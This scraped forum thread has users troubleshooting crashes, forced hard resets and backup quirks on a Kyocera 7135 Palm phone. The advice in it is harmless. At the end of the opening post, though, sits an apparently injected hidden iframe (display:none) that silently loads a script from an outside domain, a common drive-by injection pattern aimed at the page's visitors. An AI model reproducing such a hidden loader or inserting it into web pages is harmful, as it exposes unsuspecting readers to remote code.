+ Reply to Thread

My first 7135 Disaster

Well, it finally happened to me.

My 7135 bit the dust. I was just minding my own business and wham, all of a sudden it wasn't working right!

Here's what happened:

A call came in and I almost missed it because I didn't feel the phone vibrating, I just heard the lady in the dangling ear piece saying "Incoming call, answer?" So I put the earbud in and said yes and everything seemed to be working. Then I pulled to phone out to investigate why I hadn't felt the vibrator working. When I opened the flip nothing happened, nothing at all. No flip open sound, no screen waking up. Nothing.

I played with the buttons for a while, pushing this, pressing that. Holding down the power button. Nothing responded. The clock was still working on the external display, but nothing else was. So I pulled the battery (I should have pushed the reset button first, I'm such a dummy).

When I put the battery back in the Palm logo appeared, then the phone crashed with the reverse screen of death. I pushed the reset button and the same thing happened. Then it did it two or three more times and I gave up. I pulled the battery again. A few minutes later I decided to try again, so I put the battery back in. It started up this time, but apparently had gone through a hard reset as it was asking me to calibrate the stylus again. Sure enough, hard reset. Thank goodness for BackupBuddyVFS!

I ran BackupBuddy, which for some reason said last backup - never. Weird. Anyway, once it was finished backing up I tapped the "home" button and once again the phone crashed with the reverse screen of death. I reset and it seems to be working ok now. I'm worried. What could cause this? I've installed a bunch of programs that I intend to try out, but I haven't actually run any of them yet. Blazer, Xiino, QuickOffice (which I'm probably going to ditch because it doesn't support the Mac).

Any ideas? A few minutes ago I was all "woe is me!" and getting ready to call up Kyocera balling my eyes out. Now I've got a little better grip, but I'm still worried that something big may be going on here.

BTW - I installed the new Mac drivers that were posted a few days ago and it didn't clear up the trouble that I've been having HotSync.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Sorry, but I no longer make 7135 headset adapters.

Re: My first 7135 Disaster

Originally posted by coolcat

I ran BackupBuddy, which for some reason said last backup - never.
    I discovered this little anomaly too. It is a catch-22. If you follow the BB-VFS installation instructions, you will have two versions of backup buddy on your phone - one in RAM and one on the expansion card. The version on the expansion card has been placed there to allow you to do a restore in the event that you wipe everything out of RAM due to a hard reset. However, the nightly packups have to be conducted from the version of BB that exists in RAM, so if you experience a hard reset, even though everything has been backed up to your SD card, the last backup will always say "never".
    Dave

Well, its done it three more times to me since I restored from the backup. I've deleted all of the apps that I installed recently and that doesn't seem to help.

One time it beeped at me, so I checked it and it was frozen (when opening the flip nothing happens). Another time I opened it to make a call and it did it again, but I realized that even though the external clock was still displaying the time it too was frozen. Apparently it had frozen about five minutes beforehand.

If this keeps up I'm going to try to call Kyocera.

Originally posted by coolcat
    Well, its done it three more times to me since I restored from the backup. I've deleted all of the apps that I installed recently and that doesn't seem to help.

One time it beeped at me, so I checked it and it was frozen (when opening the flip nothing happens). Another time I opened it to make a call and it did it again, but I realized that even though the external clock was still displaying the time it too was frozen. Apparently it had frozen about five minutes beforehand.

If this keeps up I'm going to try to call Kyocera.
    Coolcat, have you deleted your "saved preferences"? When I encountered the problem you are experiencing, after a hard reset, I had to delete "saved preferences" from my backup folder, then do a restore from backup and after I did that, everything settled back down.
    Dave

coolcat what versions are you running? MZ & SZ also have you called or emailed Kyocera about this?

Coolcat, are you getting a reverse screen after about 30 sec to 1 min. after your SOFT reset?

My MZ is 1.0.27
    My SZ is 1.0.13

I've continued to delete programs. I also removed my SD card. I've got it pretty much trimmed down to the included software and a couple of extras (Pocket Quicken and My Bible). After my last post I had about 4 or 5 more crashes, but I haven't had any in the last hour or so. One of the crashes I didn't catch for about half an hour, when I took the phone out to make a call I noticed that the backlight for the external display was on and the clock was half an hour behind.

I was getting either reversed screens or totally blank screens. Sometimes immediately after the soft reset, sometimes 5 to 30 minutes later.

BTW, I found that the little Listerine Breath Strip packs make nice carrying cases for SD cards. (Once they're empty, anyway)

Where can I find the "saved preferences", is that on the computer? I havent' synced since yesterday, and the backup that I'm using is off of the SD card. Would that still have an effect?

It looks like I may have rooted out the problem though, since it hasn't crashed on me again yet. It may have been that the last time I was syncing, yesterday, there was an error somewhere in the middle of transferring one of the apps I was trying to install. I thought that I'd deleted it and reinstalled it, and I'm thinking that may have been what was causing the trouble. Now that I've got the system trimmed back down I haven't had another crash, so I'll wait till tomorrow to make sure and then slowly start adding my apps back in.

Thanks for the help guys.

Coolcat -
    Mine just went south. Same problems. Recovered thru backup buddy - no luck; hard reset and everything - no good; called Kyo - they could not figure it out; new unit arrived today.

Only problem - the damn thing came from Kyo with an Alltel logo on the faceplate instead of "7135". Since I use Vz, and I am a purist - this unit's going back too.

Originally posted by ozzir
    Coolcat -
    Mine just went south. Same problems.
    Did you find the problem was app instal/synch also?

T